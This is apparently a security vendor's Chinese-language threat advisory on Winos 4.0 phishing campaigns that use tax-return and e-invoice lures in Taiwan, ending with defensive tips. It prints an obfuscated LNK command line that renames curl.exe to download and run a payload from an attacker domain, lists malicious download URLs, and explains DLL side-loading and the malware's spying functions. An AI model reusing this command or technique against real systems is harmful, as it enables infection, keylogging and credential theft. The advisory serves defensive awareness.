【報稅季小心！】Winos 4.0惡意程式入侵：解析其攻擊流程與3大防禦對策

　　五月報稅季與雲端發票普及，成為駭客發動資安攻擊的誘餌。本文揭露近期針對台灣使用者的兩大惡意威脅：1. LNK 腳本攻擊：利用「稅務壓縮檔」夾帶惡意 LNK 捷徑，透過重新命名系統內建 curl.exe 規避偵測。2. DLL 側載（DLL Side-loading）：濫用具合法簽章的「所得稅申報執行檔」載入惡意 DLL。這些攻擊最終植入 Winos 4.0 惡意程式，具備截圖、側錄鍵盤、竊取剪貼簿及關閉防毒軟體 TCP 連線等高度危害。提醒民眾與企業應核實官方寄件者身分、確認下載連結與實際網址一致，並加強資安教育訓練以防杜身分資產遭竊。

　　現代科技不僅改變了我們的消費模式，也重塑了繳稅與領獎這些「生活儀式」。所得稅與電子發票已不再是冰冷的行政事務，而是透過數位化，讓生活變得更有效率且充滿「小確幸」的日常。

　　過去，每逢五月報稅季，帶著厚重的資料前往國稅局排隊，曾是許多人的共同夢魘。然而，隨著「網路報稅」技術的普及，繳稅已進化為真正的居家事務。只要一支智慧型手機，配合行動電話認證或行動自然人憑證，我們就能在幾分鐘內完成身分驗證、所得資料匯入、確認稅額與完成繳稅。這種轉變不僅大幅降低了時間成本，透過行動支付或信用卡繳稅，還能靈活安排資金調度。現在的所得稅申報，更像是確認自己與國家的「年度連結」，透過透明、快速的系統，讓這項公民義務變得輕盈無負擔。

　　電子發票則徹底改變了台灣人的消費習慣。過去，皮夾裡總是塞滿易褪色、雜亂的熱感應紙發票，現在透過「雲端載具」，每一筆消費都轉化為乾淨的數位紀錄。購物後發票自動歸戶，不僅環保，在需要退貨或維修時，數位憑證也比紙本更具保障，中獎機率相對更高，獎金還能設定自動匯入銀行帳戶。

　　繳稅季節來臨，駭客也沒閒著，利用發送稅務資訊及電子發票的名目來進行惡意攻擊。以下來說明駭客利用稅務及電子發票進行惡意攻擊的案例。

駭客透過稅務主題發送釣魚郵件進行LNK攻擊

　　駭客會發送稅務主題釣魚郵件，夾帶名為「taxIs_RX3001.rar」的壓縮檔，裡面包含惡意 LNK 捷徑(taxls_RX3001)。誘使受害者點擊後，LNK 會在背景呼叫系統內建指令(cmd.exe)，執行以下參數內容。

參數：

/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & %windir%\System32\DeviceCredentialDeployment.exe & Copy /Y %windir%\System32c^u^u. %public%\501\ur^le^x^e -o %public%\501\Setup^64.exe h^tt^p^s:/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe

包含LNK檔和當作誘餌的稅務文件

　　腳本首先在public\501建立一個工作目錄。然後，它將合法的系統應用程式curl.exe複製到該新目錄，並重命名為url.exe，繞過簡單的檔案名稱監控。

　　之後，該重命名檔案被用於從遠端https://bqdrzbyq[.]cn下載並執行名為Setup64.exe的執行檔來安裝Winos 4.0惡意程式。過程中，腳本也會執行DeviceCredentialDeployment.exe，以維持系統活動正常的假象，非常狡猾。

下載的可執行檔文件

透過電子發票釣魚郵件進行惡意DLL側載攻擊

    駭客除了上述的LNK攻擊之外，還有隱蔽性更高的DLL側載(DLL Side-loading)攻擊。攻擊者利用具備合法簽章的執行檔來載入同目錄下的惡意DLL文件。從系統架構層面來看，這利用了Windows加載動態連結的特性，使惡意程式碼可以在受信任的程序中執行。

電子發票釣魚郵件

　　釣魚郵件提供電子發票的連結顯示為httpps://www.einvoice.nat.gov.tw/，但實際上它連接到 https://njhwuyklw.com/，該連結指向雲端下載路徑 https://sdfw2026024.tos-cn-shanghai.volces.com/E-Invoice.rar的壓縮檔，解壓縮完後資料夾內會有一個惡意的DLL和一個exe可執行檔。

可執行檔和惡意的DLL文件

　　實際上可執行檔為正常的執行程式，點擊後會載入同一層資料夾內的惡意DLL文件，進行惡意活動。實際上就有利用名為「綜合所得稅電子結算申報繳稅.exe」的合法文件載入惡意DLL文件安裝Winos 4.0惡意程式的攻擊事件。

惡意程式Winos4.0對系統造成的危害

　　在這次攻擊中惡意程式創建了八個執行緒來執行不同的任務：MainThread、CloseWindow、Screenshot、Keylog、Clipboard、USB、ReadReg和 Anti-AV。

　　● MainThread：建立其他 7 個執行緒，關閉螢幕保護程式，確保惡意軟體           持續運行。

　　● CloseWindow：偵測防毒軟體，自動點擊「允許」按鈕來繞過防毒軟體跳出的警告訊息。

　　● Screenshot：監控特定關鍵字的應用程式（如銀行、聊天軟體），截取螢幕畫面，竊取重要資訊。

　　● Keylog：記錄被攻擊者鍵盤輸入資料，藉機竊取重要資訊。

　　● Clipboard：偵測改變剪貼簿內容，例如竊取密碼或更換比特幣錢包地址。

　　● USB：每3秒掃描USB裝置，記錄新增或移除的設備。

　　● ReadReg：每5秒讀取從註冊表讀取shellcode內容。

　　● Anti-AV：關閉防毒軟體的TCP連線，當偵測到TCP連線是由防毒軟體所開啟，則將該TCP連線關閉。

惡意軟體Winos4.0的威脅

流程圖：

防範利用稅務及電子發票釣魚郵件進行惡意攻擊：

● 收到財政部、國稅局或銀行的「急件」郵件，先不要急者點擊郵件內的連結或附件，確認寄件的email是否為官方信箱，如果是私人信箱請小心。

● 點擊郵件下載連結時，確認顯示的連結與實際的下載的位置是否相同，如果不同很有可能被導引到其他連結下載惡意內容。

●      定期員工資安訓練或請外部資安專家安排訓練課程，讓員工學習辨識更多的惡意攻擊手法。

想了解更多產品資訊，請連至官網https://www.neithnet.com/zh/，或直接與NEITHNET資安專家聯繫：info@neithnet.com

參考資料：

1.      https://www.fortinet.com/blog/threat-research/massive-winos-40-campaigns-target-taiwan

2.      https://www.fortinet.com/blog/threat-research/winos-spreads-via-impersonation-of-official-email-to-target-users-in-taiwan